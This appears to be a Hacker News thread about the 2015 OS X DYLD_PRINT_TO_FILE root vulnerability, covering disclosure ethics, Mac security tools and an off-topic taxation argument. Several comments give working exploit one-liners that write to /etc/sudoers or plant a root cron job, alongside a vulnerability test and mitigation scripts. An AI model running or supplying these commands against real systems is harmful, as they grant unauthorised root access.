I'm not sure who makes me more cranky: Apple for apparently sitting on the fix, or Stefan Esser for flinging the vulnerability into the breeze for anyone to catch.
Esser has his reasons - "Short reminder: Europeans are not allowed to disclose vulns privately to a foreign company like Apple without registering dual-use export"[1] - but it's hard to believe he couldn't have told them anonymously. Disclosures make careers, though, so there's a strong incentive to go public.
> I'm not sure who makes me more cranky: Apple for apparently sitting on the fix, or Stefan Esser for flinging the vulnerability into the breeze for anyone to catch.
One party makes billions off their users, and will most likely continue their practice of not supporting 3-year-old systems (even if they are still in wide use) the next time around. This should pretty much clear up who is worse.
> Esser has his reasons - "Short reminder: Europeans are not allowed to disclose vulns privately to a foreign company like Apple without registering dual-use export"[1] - but it's hard to believe he couldn't have told them anonymously.
You're suggesting that he should feel ethically obliged to break the law to help out a company that takes part in the usual tax and labor law evasion tactics (not to mention consumer protection evasion in the US)?
>> I'm not sure who makes me more cranky: Apple for apparently sitting on the fix, or Stefan Esser for flinging the vulnerability into the breeze for anyone to catch.
> One party makes billions off their users, and will most likely continue their practice of not supporting 3-year-old systems (even if they are still in wide use) the next time around. This should pretty much clear up who is worse.
I don't agree. I have a six-year-old MacBook. In those six years I've updated to a new OS three or four times. One time it cost me 20 euros; the others were free. Not only that, but updating is a breeze: it's painless and was never a problem. I never had to do a complete reinstall. My mother could have done this. It's clicking a few buttons and that's it.
On top of that, there is no serious degradation in speed. They claim it's even faster, but that probably isn't true for the older hardware. So even if they don't support their three-year-old OS, you can update your six-year-old system to the most current one without problems. They could have shipped these updates as minor ones, but that wouldn't be fun - nothing to show, no new names, no big shows.
> help out a company that takes part in the usual tax and labor law evasion tactics
Irrelevant. The moral question being raised here is about potentially hurting Apple users via irresponsible behaviour, not about helping Apple itself. Just because Apple does it (by sitting on the problem) does not make it right for other people to put the public at risk as well.
Both parties can be in the wrong at the same time; the behaviour of neither of them is a valid defence for the other.
You do have to be very careful in these cases because of the way the law is set out and how easily companies turn to litigious defence instead of actually fixing problems. In this case I would recommend anonymously informing the controlling party. Of course if he had already done that then things are different and public disclosure is probably the only other thing he could have done.
> The moral question being raised here is about potentially hurting Apple users via irresponsible behaviour
The logical next step is that Apple have been intermittently flippant about security (of late they have improved, but their approach is still unacceptable across the board). Why do users knowingly use an OS with this track record?
> anonymously informing the controlling party
With government surveillance could he have had any guarantee that his disclosure wouldn't have been snooped?
Either way this discussion can be argued ad infinitum. The real villain here is the European Commission for such a brain-dead policy.
>The logical next step is that Apple have been intermittently flippant about security (of late they have improved, but their approach is still unacceptable across the board). Why do users knowingly use an OS with this track record?
Perhaps because ever since 2001 there have been 5-6 new stories like this, with huge scaremongering headlines and "sky is falling" implications, and then absolutely NOTHING happens; at worst a minuscule fraction of OS X boxes is ever affected, and there are absolutely no implications for 99.9% of users. In the meantime Apple, even if slow to respond to stuff like this, does improve the OS X security infrastructure steadily.
Meanwhile, in the same real world, people have to constantly fight viruses off of Windows boxes (slightly better after 8, but still a real concern).
Btw, no, it's not just about "small market share" either. Classic Mac OS had an even smaller market share in the late 90s (as little as 1/10th that of OS X), but it still had lots of malware and viruses that people caught.
> "sky is falling" implications, and then NOTHING absolutely happens
Sure, just brush off a sudo vulnerability.
> fight viruses off of Windows boxes
Virus != vulnerability.
Furthermore, while a rootkit is still a virus, it's a far cry from the relatively benign things running around on Windows machines (not that I mentioned Windows at first, but there ya go - we're onto that now). Just to avoid a Windows shitstorm, the same thing could be said of BSD: I am absolutely certain that there is at least one virus for the platform; however, the damage it could possibly do is seriously mitigated by the security of the platform.
"Viruses" (used as a distinct term to "rootkits") can at worst log a few keys up until your next virus scan. After that, poof! They're gone.
A "rootkit" (which requires a sudo/UAC vulnerability) can also at worst log a few keys or something. When you do your virus scan you're going to find nothing. It's going to sit on your machine until kingdom come because the virus is more privileged than you.
Security is like a backup. You only care about it when you have the random bad experience of actually needing it. I'm sure there are a bunch of Windows users who lament turning off UAC now that their files are all encrypted by ransomware. It has nothing to do with "market share" and has everything to do with risk: "UAC is such a stupid feature."
I could leave my keys in my car ignition every night of my life. No matter how much "market share" that car brand has all it takes is the random misfortune of someone on the street noticing that I do that.
Just keep in mind that it was you that brought up all these tangential topics.
Viruses are not going to go poof unless your antivirus knows about them.
And in the typical case a vulnerability is a prerequisite for a virus.
But local vulns are only a concern if someone already has access to your system, in which case you're usually fucked anyway. Which is why Apple introduced developer certs and Gatekeeper.
If it doesn't impact me, and never has, I will. Just like I don't feel any need to run antivirus and anti-spyware on my Ubuntu box, whereas I do on any Windows box I own (3 of them).
>Virus != vulnerability.
Well, the vulnerability has to be exploited to matter - by some virus, some hackers, some malware, creating a botnet, whatever. If it never is, or if it's always in the form of some trojan needing a stupid user to install it willingly, I don't care about it.
The mere existence of it is not really important. All systems had, have, and will have some vulnerabilities.
I'm not some wide-eyed believer in the invulnerability of OS X. I cut my teeth on SunOS (pre-Solaris) and HP-UX, and I've run Linux since 1997.
I just don't care much for hypotheticals.
As for my data, I back it up. If anything happens I can go back to a clean system within 10 minutes, using rolling archived bootable backups. And I can re-install from scratch and dump my data back in around 5 hours (I just did it a few weeks ago to try El Capitan).
>Security is like a backup. You only care about it when you have the random bad experience of actually needing it. I'm sure there are a bunch of Windows users who lament turning off UAC now that their files are all encrypted by ransomware. It has nothing to do with "market share" and has everything to do with risk: "UAC is such a stupid feature."
Well, it's kinda stupid. Even with UAC enabled, the same users would just have gone ahead and authorized the malware to install in the first place, not knowing what it was and just wanting to get the prompt out of the way.
Besides, if they had earlier backups of said files, removing the ransomware and restoring the original files would be a few minutes' affair.
>I could leave my keys in my car ignition every night of my life.
And if you live in certain countries where car theft rarely or never happens, you'd be justified, too.
There are countries where people sleep and even leave their houses with the doors unlocked and windows open.
Not because theft is impossible -- just because it's rare enough that it barely even registers, and they don't feel any need to be paranoid.
It's a healthy lifestyle, even if 1 in 100,000 has something stolen from time to time.
Heck, it's healthy even if it's you that has had that misfortune.
I have a 2011 MacBook Pro. Sure, it doesn't get App Nap or a few other small features even though I've installed an SSD, but OS-wise I've been able to install every update since I bought it. It's still supported, especially hardware-wise, as I found when I had a couple of issues with it.
> Esser has his reasons - "Short reminder: Europeans are not allowed to disclose vulns privately to a foreign company like Apple without registering dual-use export"
I don't think of this as strictly career advancement. I think he is making an important legal and political point. If there were never serious issues while we operate under said laws, then they would never be changed or subject to question either.
Could you explain the dual-use export issue? I read a little about it here [1], but I don't understand. So, if Esser were to contact Apple and provide them with the vulnerability info for free, but without first registering it as a dual-use export, he could get in trouble? Even if he didn't receive any compensation from Apple? Is that the case?
That's a really sad state of affairs. Instead of promoting security, which is what the law claims to do, the law is actually promoting insecurity - which is probably the true end goal of the law anyway, if that's the way it's written. Threaten people with jail unless they first register security vulnerabilities with the government; then, when they do so, threaten them with even more jail time if they ever speak again about said vulnerability, and keep the vulnerability for yourself. I guess the EU is just pissed that the NSA has better toys. Really, truly sad state of affairs.
Dynamic linkers trusting variables during setuid operation has long been a place known to be security-sensitive (or alternatively a fruitful source of privilege escalation bugs; see CVE-2010-3847 re LD_AUDIT, http://seclists.org/bugtraq/2004/Aug/281 re LD_DEBUG, CVE-1999-1182 (!) re LD_DEBUG, etc.). The bug had never been particularly hidden from those with a malicious eye.
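For anyone who wants to see that hardening in action on a Linux box, glibc's loader simply drops its debug variables across a setuid boundary. A rough sketch (behaviour varies by glibc version and configuration):

# Loader debug output (on stderr) appears for an ordinary binary...
LD_DEBUG=files /bin/ls / >/dev/null
# ...but is silently ignored when the target is setuid; sudo is just a
# convenient setuid example here.
LD_DEBUG=files sudo -V >/dev/null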
Frankly, I find myself reading dyld's source code every so often when tracking down something or other with OS X program loading. I'm not saying I would have caught it, but I'm pretty sure I'm not the only one who reads it non-maliciously.
Furthermore, it was fixed in 10.11 betas, so Apple themselves already knew about it [edit: apparently not]:
A repost from the comments on the original article indicates it may have been fixed because Apple changed something in the way it handles permissions:
>EdisonCarter 3 days ago
>It's only really "fixed" in El Capitan as a side effect of Apple introducing the new - and widely reported - "rootless" security feature, which introduces fine-grained file permissions.
> Disclosures make careers, though, so there's a strong incentive to go public.
And Apple is doing their part by not emphasizing the role of the person who did disclose responsibly:
This is obviously very bad news. Apple has evidently known about this issue for a while now – not due to Esser, but thanks to a responsible researcher going by the Twitter handle @beist, who had alerted Apple some time before Esser discovered the bug.
As an outside observer, all I see here is: Don't alert Apple.
You forget your key when leaving for work, and you don't lock your door. It was accidental; you have a lot on your plate. Your neighbour sees you didn't lock it, and tweets, "Hey, Mike at 321 Greyhat Blvd didn't lock his front door". He didn't send that to you as a text; he tweeted it. You come home, and you've been cleaned out.
I'm sure we can all agree you should have locked your door. Why be mad at your neighbour? He didn't leave the door unlocked; he didn't take your stuff...
A better analogy would be your doorman, whose one job is to watch who gets into your building, leaving the key cabinet unlocked and going to lunch.
I don't mean to blame any individual human here, but I'm baffled at the process by which debugging environment variables were added to dyld without being carefully vetted for bad interactions with setuid binaries. This is a well-known easy place to screw up, and I'm surprised that someone was working on dyld without knowing that (although yes, humans forget things sometimes), and much more surprised that this made it past code review and into a shipping product.
This isn't a random screw up in regular software. dyld is security-sensitive; it's one of the small number of libraries that bears a responsibility to be paranoid about setuid.
I'm sure we can all agree we can make up shit that can happen till the cows come home. I'm not going to act as if someone robbed me until they do. Hold Esser responsible if someone hacks a large number of people because of what he did. Otherwise, stop living a thousand lives.
At least read about responsible disclosure before being so flippant about things like that.
Esser put people at risk. Whether or not anything happens is irrelevant. He put them at risk and we need to recognize that is the cost of full disclosure.
If you're fine with that, cool, but don't pretend he didn't do anything.
> If you're fine with that, cool, but don't pretend he didn't do anything.
Don't speak for me. I never said he did the right thing. I said stop spinning what-ifs about it, but clearly what I should have said is STFU and do something about it. People getting in each other's grill isn't doing something about it. It's blaming others for whatever issues we, as a group, find polarizing.
>That's non-provable until we see it instantiated.
That's not how risk works. I don't even know where to start. If you play a round of Russian Roulette and happen to hit an empty chamber, do you say it's impossible to prove you were at risk? Do you see now how dumb that argument is?
If he publicized a vulnerability, the risk to all of the affected systems is increased. Period.
It's the same way that EMPs are a risk to airlines. If someone releases a method to generate them very easily, they increase the risk to all airlines. You don't have to wait until an airline is brought down before you say the risk was increased.
Well, Apple knew about the vulnerability long before Esser reported it. So "responsible disclosure" would have achieved nothing; we shouldn't be comparing public disclosure to it, but comparing public disclosure to no disclosure.
Actually, that's not a consequence. A consequence is "200K credit cards were stolen and created $50M in losses". Our assumption (nay, EXPECTATION) that we can achieve a perfect record through responsible disclosure is akin to dissonance, which is why this topic is so polarizing. Let's save our judgement of him until we have evidence that shows why what he did was wrong. Until then, this is all a waste of effort.
1) The person who left the house open was certain to get the message more quickly because of the tweet than from just a text.
2) It was possible to quickly and remotely lock the door. Apple can and should fix this bug very quickly, as that is certainly possible for them.
From the author in the comments: "In Esser's original post revealing the vulnerability, he said, 'At the moment it is unclear if Apple knows about this security problem or not.'"
So basically he just released it without disclosure. He claims reasons (see parent post), but it's still kinda icky.
Just giving the benefit of the doubt here: a lot of the time it's unclear whether your disclosure even made it to the right people in a company. No response is the norm for security disclosures, as are claims of "we didn't get this", even if you have a receipt from their ticketing system that says they did. I've sometimes spent far longer attempting to contact a company than doing the research into something that seems to be a problem.
It's easy to prove. Just go look at the number of iOS and OSX security fixes attributed to him. Or you can go do a simple search on any reputable site posting security info and you'll see him all over it.
> Stefan Esser for flinging the vulnerability into the breeze for anyone to catch
Then let me help you with this one: the former is the responsibility of the world's most profitable corporation, with tens of thousands of employees, and the latter is the responsibility of a random guy on the internet.
Both are in the wrong. The behaviour of neither is a valid defence for the behaviour of the other.
Apple are irresponsible for not addressing the issue in good time (they have known about it for long enough).
This fellow is irresponsible for not following decent "responsible disclosure" procedure. He released information of a serious exploitable problem without first making any attempt to inform the people who could do something about it or otherwise checking to see if they were already aware.
Relative size, income, employment/employee status, and so forth, are all irrelevant here.
You can pin responsibility onto a huge corporation. They can be liable for it. But you cannot control the behavior of random people on the internet without seriously impinging upon the general freedom of people everywhere. So the question of liability and responsibility is irrelevant if placed upon a random individual (unless you want a police state). It's best to hold the huge corporation liable.
>But you cannot control the behavior of random people on the internet without seriously impinging upon the general freedom of people everywhere.
This isn't true at all. Shaming people for unethical or unprofessional actions which they make publicly is quite effective in altering behavior and doesn't require a police state.
So are you suggesting waiting to disclose until Apple releases a patch? Because there's a good chance that would never happen without it going public.
Apple doesn't really seem to care much about its users once their money has changed hands. Look at how long every iPhone in the world could be remotely rebooted via a single text message. That took nearly two months to fix.
They're much more interested in getting you to sign up for their new music service than they are in making sure the devices you use it on are secure.
I'm seriously shocked. This is ridiculous. This looks like possibly the easiest root exploit ever discovered on a desktop OS (a one-liner in bash). Why in the world would they let an env variable make a setuid binary write to an arbitrary file?
I'm suddenly very glad I don't use my MacBook as my main machine, but I guess I'll remove the set{u,g}id bits on newgrp for now. I don't know if that will break things, but it's better than getting a rootkit.
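For reference, the proof-of-concept making the rounds is roughly the following (quoted from memory of the public reports; it really does append to /etc/sudoers, so don't run it casually):

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp
sudo -s   # no password prompt any more

And the stopgap, assuming nothing on your machine actually depends on newgrp being set{u,g}id:

sudo chmod u-s,g-s /usr/bin/newgrp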
Not as ridiculous as the response here, which is to bend over backwards to excuse the richest company on the planet, when compared with the scathing responses vulnerabilities in Adobe, Oracle, or Microsoft products receive.
Many technologists have the whole suite of Apple products. They have invested thousands of their own money and years of their own time in Apple products. This changes their relationship with the corporation and leads them to defend their investments. To say "you made a bad choice" when someone has invested so much will naturally lead to a defensive response.
Thus, the bending over backwards to excuse the richest company on the planet is very understandable - especially on HN, with its fair share of early adopters and deep pockets.
It's a good contender, but in 10.2 you could hold down a key at the screensaver lock screen and overflow a buffer, crashing the screensaver and logging you in. Seriously. Not a root exploit, but embarrassing.
> That 'fix' is going to break a lot of other stuff.
True, but a short-term replacement along the lines of:
#!/bin/sh
# Strip the dangerous variable before the real (renamed, still setuid)
# sudo starts, so its dyld never sees it.
unset DYLD_PRINT_TO_FILE
# Cleanse the sudo arguments here...
# Check MD5 of /etc/sudoers against a known-good value here...
exec /usr/bin/the-renamed-sudo "$@"
would do the trick when put in place of /usr/bin/sudo.
That `unset` is useless since they don't call sudo to initiate the exploit. The setuid/setgid bits on the newgrp binary are to blame here (combined with the env variable). They could just overwrite your new /usr/bin/sudo file if they wanted to. Hell, they could brick your entire system just out of spite. No sudo necessary.
My point was to show that this very nasty exploit can be mitigated in the short-term by introducing a wrapper script to "protect" setuid programs.
> That `unset` is useless since they don't call sudo to initiate the exploit. The setuid/setgid bits on the newgrp binary are to blame here (combined with the env variable).
You are quite right. In an effort to be concise, the example wrapper unset the environment variable (for completeness) and mentioned checking /etc/sudoers against a known-good hash. I did not properly explain the mitigation strategy and should have stated that wrapping and unsetting the environment variable should be done for all setuid programs. Doing so should block this attack vector until a vendor supplied patch is available.
Is it an ugly hack? Probably. Doable, though, and I believe capable of defending against this particular vulnerability.
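For anyone attempting this, a starting point for enumerating what would need wrapping (a sketch; the directory list is illustrative):

# List the set-uid and set-gid binaries in the usual system directories:
find /bin /sbin /usr/bin /usr/sbin /usr/libexec \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null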
I'm not sure why you would bring up Windows 95. Aside from being two decades old, it never claimed to be secure or a multi-user OS. Security-wise, I don't see how it was worse than Apple's contemporary System 7.
I keep asking this question and Mac people keep looking at me like I'm an alien, so I guess I'll turn to the HN community for this one.
What do you recommend as security software for OSX currently? How do you help secure your devices from public wifi and the internet in general? Especially for novice users?
Security software is a band-aid on vulnerable software and users installing things they shouldn't.
Part of the OSX security strategy is to minimize users installing things they shouldn't by making it difficult (enforced code signing, confirmations when opening an unsigned or new application). The other side is minimizing attack surface for exploits by staying up-to-date, not shipping crap like Java unless the user explicitly needs it, and (increasingly) sandboxing applications to user-approved subsets of the filesystem.
Bolt-on detection and resolution of malware infections is just not a part of the OSX security ecosystem like it is with Windows.
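Both halves of that strategy are scriptable if you want to poke at them yourself (Example.app is a placeholder):

# Ask Gatekeeper for its verdict on a bundle:
spctl --assess --verbose /Applications/Example.app
# Verify the code signature itself:
codesign --verify --deep --verbose=2 /Applications/Example.app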
Little Snitch can help give you a picture of what's going on with regard to your network card, but at the end of the day malware can usually hide its traffic in an otherwise-trusted application to avoid that sort of detection.
I believe in defense in depth. There is always going to be an escape. Within the last month there have been several different privilege escalations possible in OS X. While I appreciate OS X having a strong security model, secondary solutions are desirable to me.
So excellent that some malware deletes itself if Little Snitch is even installed (https://www.f-secure.com/v-descs/trojan-downloader_osx_flash...). However, it's worth noting that "DYLD_PRINT_TO_FILE" is a root exploit, which may circumvent or disable Little Snitch entirely if used by an APT; Little Snitch may not see all network activity. In fact, a root exploit allows one to write malware hidden from userland altogether (lsof, ps, tcpdump, etc.) (https://github.com/hackedteam/driver-macos). It is truly scary how vulnerable OS X is at the moment.
As a Little Snitch user, I'm inclined to agree, but I find that I sometimes end up in a state of "WTF wants to use the network now?!" saturation.
My solution for that is to deny anything I don't recognize, and create rules for things I see more than twice, but if you're conditioned to click "OK" on everything you see, Little Snitch isn't going to do much for you...
I really wish Little Snitch could generate aggregate rules for apps. I keep having situations where an app starts making requests over and over until I realize that the developer is using https requests to cdn###.somehost.com where ### is apparently a dozen or more different hosts, and the only option I have is to just allow all https traffic rather than more granular by-host rules.
Although be aware that it can be quite daunting for a novice user. If you're installing it for a friend or family member, you should go through all of their apps to whitelist requests and maybe teach them how to identify bad requests, but it's non-trivial. The UI doesn't interact very well with CDNs, for example, sometimes telling you that "App Store" is trying to access "arstechnica.com" because they use the same CDN provider.
Our old infosec guy at work used the icefloor PF management tool. It seemed interesting, and I mention it in the vein of the venerable Little Snitch.
I've used both; they're a good start, but any sophisticated rootkit will be able to work under the hood, and these tools won't detect it. Also, some malware functionality can be injected into legit processes that make use of the network, making it invisible to these filters. http://www.arbingersys.com/osx-injection-override-tutorial-h...
If you really want to monitor what's going in and out of your computer, you'll need to use Wireshark from another computer on your network... =)
Does anyone know of anything like Little Snitch or ZoneAlarm for Linux? I miss the program-level firewall capabilities of these programs when I'm on Linux.
Remove/do not install Flash and Java, and make sure that Gatekeeper is at the middle setting. Turn your firewall on regardless, and/or monitor your network activity. If you know what a packet is, then Little Snitch; if you don't, Radio Silence is what I set my parents up with.
"Public wifi", not "your own connection". You have two options for who you decide to trust:
1) A VPN company, which you've had the opportunity to research, whose primary business and reputation are based on handling your traffic.
2) Each and every WAP you connect to, in many cases with no real means to verify it's actually, e.g., the official WAP of the hotel you're staying at, for something that likely costs the owners money rather than being seen as a profit center in and of itself. Their primary business and reputation are staked on something completely different than their handling of your traffic (be it their coffee, their accommodations, whatever).
If you trust #2, statistics eventually come into play - you will trust someone who shouldn't have been trusted. This also ignores that "public wifi" frequently performs MITM attacks for the... not entirely unreasonable purpose of providing login gateways, terms of use, etc. when you initially open your web browser. But if you're already MITMing traffic, it's not as big a stretch to substitute your own (poorly vetted) advertisements and affiliate links for a little extra revenue. Even if you don't do that, there's no guarantee your MITM tech isn't accidentally weakening security à la Superfish.
I think you put far too much trust in one of thousands of clone VPN services. There's no reputation to taint; they're stock-standard scripts running on commodity VPS boxes rented from somewhere else. I would be shocked if at least some of the most commonly used ones weren't run by people looking to sniff credentials. You're paying to pipe all of your sensitive information through some random person's box, which is just ludicrous.
You should trust your endpoints. Assuming you trust the machine you are using, the other end of the tunnel should be just as trustworthy. That's great if you trust a company; but what incentive do you have to trust them?
As a general rule, I don't use public wifi and counsel people to use a VPN if they must. No Flash, disable Java in the browser, prefer Chrome to Safari, AdBlock and NoScript if you don't need JS.
I have removed Flash from my machines but using Chrome over Safari is like kissing your battery goodbye. It does not put the CPU to sleep properly for some tabs. It is sad.
You can set it up to disallow all network traffic until you whitelist the binary. Not sure if it's actually hashing them or just checking the path though.
It still pains me that OS X ships with the firewall disabled by default. I don't think it's reasonable to presume that every OS X device will be on a private network behind a NAT, or that everyone will know to turn their firewall on. However, this appears to be the assumption Apple are making! You can do better!
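For what it's worth, turning it on doesn't even require the GUI; the bundled socketfilterfw tool can do it (flags as I remember them - check its help output):

sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on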
After spending quite some time deliberating on this, and not wanting my users in the wild without something, I finally settled on Bitdefender. I control clients from the cloud console, can push policies, run scans, updates, all without user interaction. Right now I'm only using the AV part for most devices though, as enabling the full package of internet firewall and website scanning was eating up lots of resources.
The two follow up contenders were ESET and Kaspersky.
Isn't this the time when the Mac App Store is supposed to shine? When they find something dodgy that's linked to a company that has apps on the App Store, can't they just turn on the kill switch? That way the malware won't have anywhere to direct the users to.
It's not clear whether this "adware installer" is signed by a developer cert. I'm gonna guess it isn't, which means under the default settings, if a user double-clicks it to execute it, they'll be presented with a message saying that the app can't be run because it's "from an unknown developer" and the current settings disallow it. The user can get around that by right-clicking it and choosing "Open" (or switching Gatekeeper to be more relaxed), but the error message doesn't allude to this.
Edit: And if it is signed: yes, I believe Apple could and presumably would push out a malware update that would invalidate the cert.
I'm getting at the fact that a shell script with this exploit can be made to look like an "app" and be "double-clickable", and doesn't require any code signing.
Gatekeeper also watches over shell scripts, so when you double click the shell script it will tell you that you can't open it because it is from an unidentified developer.
You're thinking of quarantine. You'll get a warning saying the script was downloaded from the Internet, asking if you're sure you want to open it. Again, nothing to do with code signing.
I think you are misunderstanding something. Shell scripts and unsigned code are treated exactly the same by Gatekeeper.
When you double click a shell script downloaded from the internet, the warning will not ask you if you want to open the file. The warning will tell you that you can't open it because it is from an unidentified developer.
Let me try to clarify this:
"Quarantine" is a flag set on files downloaded from the internet.
When you open a file with the quarantine flag, Gatekeeper checks the code signature. If it is valid, it asks you if you want to open this file that you downloaded from the web. If the code signature is not valid, or if the file has no code signature, you won't be able to open it.
There are several ways to execute shell scripts downloaded from the internet:
1) Check "Allow all Applications" in System Preferences
2) Right click, select open. Then the warning will have a second option to open it despite being unsigned
3) Execute it from the command line
All of these presumably require the user to know what they are doing...
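The quarantine flag itself is just an extended attribute, so it's easy to inspect from the command line (the path here is hypothetical):

# Show the quarantine attribute on a downloaded file:
xattr -p com.apple.quarantine ~/Downloads/script.sh
# Deleting it is exactly what makes Gatekeeper stop caring:
xattr -d com.apple.quarantine ~/Downloads/script.sh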
I haven't gotten to try it to confirm, but I'm having trouble imagining why an unsigned .app bundle containing a binary executable would get the code-signing error but one containing a script wouldn't. Is that in fact the case?
Sorry for not making this more clear. Create a shell script with the exploit, then remove the .sh extension. You can edit the icon to make it appear as any application and when double-clicked it will open and run in Terminal.app.
Ah, thanks for clarifying. I suppose it wouldn't have execute permissions if downloaded from a browser, but it could if copied with Finder from a network share (or directly accessed, of course), so that sounds like a potential vector.
This is bullshit. If you actually put that disk image on a web server, and then download it, you'll get the unidentified developer warning and you can't run the script (there will be no button to open it).
Gatekeeper and code signing work hand in hand. You can run any unsigned code you want, as long as you didn't download it from the web. For example, Gatekeeper won't prevent you from running unsigned code you compiled yourself, or from running code you installed using a package manager.
OS X is smart enough to know that a shell script is equivalent to an application. You can't fool Gatekeeper quite that easily.
Oh, yeah, I should've thought about dmgs. Yikes... that seems "not OK"; but if they made shell scripts require signing I imagine that'd probably break lots of stuff.
> When they find something dodgy that's linked to a company that has apps on the App Store, can't they just turn on the kill switch? That way the malware won't have anywhere to direct the users to.
If Apple did this you could take down any app from the App Store by writing some malware and making it "advertise" the App Store listing.
Did you check the root directory for a file named "this_system_is_vulnerable"? I just tested this on a mid-2015 MBP running 10.10.4 and found that file in the root directory. :(
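For anyone else who wants to check, the test circulating alongside the reports is roughly this (crontab is setuid, and /usr/bin/true as the editor makes it exit immediately):

EDITOR=/usr/bin/true DYLD_PRINT_TO_FILE=/this_system_is_vulnerable crontab -e
ls -l /this_system_is_vulnerable    # if this file exists, you're affected
sudo rm /this_system_is_vulnerable  # clean up afterwards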
Will a major OS vendor ever start taking object-capability ideas seriously? It seems this is part of a class of vulnerabilities that simply couldn't occur under that model.
No, because the vulnerability is that you can write to arbitrary files with root privileges. It turns out that sudoers is the easiest file to write to to gain persistent root, but there are millions of other things: /etc/passwd, /etc/cron.d, /root/.ssh/authorized_keys, any binary that's run by root, etc.
/etc/sudoers is not the only potential target here. Even if that did work, this vulnerability could still brick your entire OS. They could overwrite any file they wanted to.
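To make that concrete, here is the same primitive aimed at a different root-owned file - a hypothetical cron payload instead of sudoers (assuming cron picks up /etc/crontab on the target):

echo 'echo "* * * * * root /tmp/payload.sh" >&3' | DYLD_PRINT_TO_FILE=/etc/crontab newgrp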
Would it make sense for the kernel to use a fresh, empty environment when executing a setuid binary?
Or perhaps a fresh environment with a few of the most important variables sanitised and copied over? And perhaps with the old variables available with a prefix (_UNPRIVILEGED_DYLD_PRINT_TO_FILE etc)?
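You can emulate the idea from userland today with env -i, though only a cooperative caller benefits (the whitelist below is illustrative):

# Exec a setuid program with a scrubbed, whitelisted environment:
env -i PATH=/usr/bin:/bin:/usr/sbin:/sbin HOME="$HOME" TERM="$TERM" sudo -s

Of course, an attacker simply won't opt in, which is why it would have to live in the kernel or the loader as you suggest.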
Well, it's not cognitive dissonance - it's not holding two contradictory thoughts; it's more a refusal to believe, and more so a defence of investment.
Early adopters, technologists and many Hacker News readers have spent thousands in both time and money on Apple. An attack on Apple is an attack on their investment, leading to defensive behaviour. To think to yourself "oh, now I'm going to ditch Apple and choose Linux" causes psychological harm, as you have to 1) admit that your time and money were wasted on Apple, 2) admit you made the wrong choice, and 3) learn another technology, which you don't want to do.
Thus it's easier to fight an attacker than to admit defeat.
Dissonance is harder to resolve than it is to 'deal with'. I'd say you are on the mark with your last two statements and wrong about it not being cognitive dissonance. I can only claim that because I spend an inordinate amount of time thinking about it in terms of cloud services and trust. :)
I have to try this if I remember! That'd be very interesting. The console obviously has many legitimate uses. Why wouldn't I try it out if I were thinking about buying a mac?
Do Apple employees not drive cars on roads (paid for by the taxpayer)? Do they rely on no technology whatsoever which did not rely on the taxpayer to exist (for example, er, the internet)? If they want to defend some other part of their property under the law, are they paying their own judges?
Of course Apple avoid taxes - anyone who can do so without fear of getting significantly punished does. But the idea that this is a brave stand against The Man is transparently ridiculous - especially so for any technologist, given our industry's heavy historic reliance on both the academy and the military. Should you pay the mafia for 'protection'? No. Should you pay the security guard for actually protecting you? Yes.
> Do Apple employees not drive cars on roads (paid for by the taxpayer)?
If a mafia built roads, would that make its extortion alright?
> Of course Apple avoid taxes - anyone who can do so without fear of getting significantly punished does
Exactly. Think about that for a while there. You're basically saying that no one would pay taxes without being forced to.
Would anyone pay a mafia protection money without being forced to? That's how extortion works you know.
There you go. Governments force us to pay taxes, exactly because otherwise we wouldn't pay them, which shows how irrelevant all the services provided with extorted money are.
Are you saying the government is extorting in the name of taxes?
Taxes are important because some things (like laying roads) cannot be selectively implemented. You can't ask only some people to pay for the road and forbid the rest from using it.
> I'm saying taxation is extortion, and just as immoral as when a mafia does it.
This is a ridiculous comment. I realise the social contract has broken down somewhat in recent years but if you can't see the difference between Mafia extortion and government taxation there's something wrong. Here's just one difference: we can vote for the government.
> Here's just one difference: we can vote for the government.
So what? Go ahead and tell me how and why that matters with regard to taxation itself.
Again, if a mafia let you vote for the new mafia boss, would that make extortion alright? Would it be good to be bossed around by a mafia boss you voted for? Would getting elected make it alright for him to extort you?
You do realize they're still taking your money by force, don't you? What difference does it make that you drop a piece of paper into a box once every few years?
How do you intend to have money without a central bank? Should we all swap gold bars? What if I have a different view of the value of gold/bitcoin?
Also, I'll play along if that's what you want.
> You could just build a road and then ask people to pay for using it
1. I'm going to use your road and not pay. What are you going to do about it?
2. I don't believe you have rights to the land the road is on. How do you prove you have that right?
3. I'm going to build a circular road around a village, then charge $1 trillion for anyone to cross it. Should they starve to death rather than disobey me?
4. I've just shot your best friend in the street because I didn't like the colour of their hair. What are your options?
Please feel free to explain how, in the absence of taxation or joint societal constructs like a government, you're in a good place here?
Incidentally, I've just come back from the Netherlands, where the rather excellent Rotterdam Museum of Customs had a series of quite nicely inquiring exhibits going into exactly why we pay tax and all the nice things it gives to the Netherlands. I wish my own society (the UK) felt more confident about putting forward a pro-taxation argument. Ultimately, it's a kind of social glue that's needed I think.
Also this shouldn't need pointing out, but I did answer at least one of your questions:
> You do realize they're still taking your money by force, don't you?
... with the response:
> How do you intend to have money without a central bank?
I guess I could generalise it to "plus law courts, legal system and police force," if you like.
The real problem you have is that "someone taking your money" assumes you have money in the first place, and there's no such thing as money absent a framework that provides it. Otherwise it's just bits of green paper/coloured metal/bits on a computer.
Or would you like to swap ten chickens for my sheep? No? I think I'll just shoot you and take the chickens anyway then.
And the police? Fire departments? Social security? Town planning/maintenance/social policy/etc etc etc.
Essentially the only system without tax is anarchy, and if you are bona fide advocating that - well I wish you the best of luck in your brave new world.
> You could just build a road and then ask people to pay for using it, much like you can build an iPhone and ask people to pay for one if they want it.
Or much like tolls on existing roads/bridges [e.g. the Golden Gate Bridge, the Pennsylvania Turnpike, the M6 Toll, the German Autobahn (as of 2016)].
Spurious reasoning. You can't negotiate with the mafia, they do not represent your will and they offer no services. If you want to argue that governments do none of these things, then by all means do so via the democratic process. If you want to argue that the mafia DOES, my cousin Vinny would like to meet you for a coffee.
These laws and agreements in your list were heavily lobbied by big corporations including Apple. One of the main reasons why their influence on politics is so big is that they are undertaxed.
Concentration of capital in the possession of one agent is bad because of the positive feedback loop. This is why progressive taxation must be applied to corporations like it's applied to people, and why the government's budget must be balanced.
So you think big corporations control the government, but you want the government to tax them so hard that they won't have the money to control the government anymore?
Don't you think they'd bribe politicians not to tax them too hard?
Also, if you tax those hundreds-of-thousands-of-jobs-providing nasty corporations into the ground, lots of people will lose their jobs. How's that for the common good?
